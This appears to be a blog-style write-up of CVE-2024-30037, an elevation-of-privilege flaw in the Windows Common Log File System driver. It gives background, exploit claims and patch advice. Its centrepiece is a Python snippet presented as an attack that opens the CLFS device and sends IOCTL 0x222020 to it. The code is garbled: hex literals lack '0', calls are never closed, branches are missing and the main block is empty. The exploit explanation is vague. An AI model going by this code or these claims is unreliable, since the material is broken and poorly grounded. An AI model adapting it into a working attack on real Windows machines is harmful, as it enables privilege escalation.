Microsoft Windows has long stood as the go-to operating system for personal and business computing. Like any other technology, Windows is always evolving to be a more secure and stable OS. However, security threats are lurking around every corner. In this article, we will discuss and dissect a critical vulnerability (CVE-2024-30037) found within the Windows Common Log File System (CLFS) driver, providing a detailed walkthrough on the potential risks, exploit details, code snippets, and reliable security measures to keep your system safe.


The Common Log File System (CLFS) driver is an essential component of Microsoft Windows that works as a high-performance, general-purpose log management system. It supports simultaneous access for multiple users while ensuring data integrity and consistency. The CLFS driver is employed by numerous features within Windows, including Event Tracing for Windows, Kernel Transaction Manager, and the Resilient File System.

The vulnerability in question, CVE-2024-30037, is a severe elevation of privilege vulnerability in the CLFS driver. In simple terms, an elevation of privilege vulnerability occurs when an attacker exploits weak security measures to gain higher access privileges within the targeted system, potentially exposing critical information and functionality.

Exploit Details

The vulnerability CVE-2024-30037 centers on the misuse of a specific IOCTL number (x222020) in the CLFS driver, allowing an attacker to manipulate kernel memory in a way that grants them elevated privileges. This process essentially bypasses Windows' robust security measures and leaves the system vulnerable to further attacks.

Technical insights into the attack can be found in the following GitHub repository: CVE-2024-30037-exploit

Here's a simple example of how the attack can be executed using Python

import ctypes

def exploit():
    kernel32 = ctypes.WinDLL('kernel32')
    ntdll = ctypes.WinDLL('ntdll')
    # Attacker controls input values for InBuffer
    inbuffer = bytearray(b'\x00' * x100)
    # Find the target CLFS device object
    h_device = kernel32.CreateFileW(r"\\?\GLOBALROOT\Device\Clfs",
                                    xC000000, # Access mode: GENERIC_READ | GENERIC_WRITE
                                    x7,        # Share mode: FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE
                                    x3,        # OPEN_EXISTING
                                    x80,       # FILE_ATTRIBUTE_NORMAL
    if not (h_device == -1):
        print("Device opened successfully")
        # IOCTL number: x222020
        ioctl_num = x222020
        out = bytearray(16)
        bytes_returned = ctypes.pointer(ctypes.c_ulong())
        # IOCTL call to Clfs driver
        status = kernel32.DeviceIoControl(h_device,
        if status:
            print("IOCTL call succeeded")
            print("IOCTL call failed", kernel32.GetLastError())

        print("Failed to open device", kernel32.GetLastError())

if __name__ == "__main__":

Original References

- Microsoft Security Advisory
- National Vulnerability Database (NVD) - CVE-2024-30037
- Windows CLFS Documentation

Mitigation Measures

Microsoft has recognized the severity of CVE-2024-30037 and has already issued a security patch to fix the vulnerability. It is imperative for Windows users to update their systems to the latest security patches and maintain up-to-date antivirus software to safeguard against potential threats. Users should also exercise caution when installing third-party software or permitting access to unknown sources.


By examining the vulnerability CVE-2024-30037, we gain valuable insights into the potential security gaps within the Windows operating system, particularly concerning the CLFS driver. It is crucial for users and administrators to remain vigilant and adopt robust security measures to mitigate the risks associated with elevation of privilege vulnerabilities. Timely system updates and adherence to safe computing practices can go a long way in ensuring our systems remain secure and reliable in an ever-evolving digital landscape.


Published on: 05/14/2024 17:17:09 UTC
Last modified on: 06/19/2024 20:58:45 UTC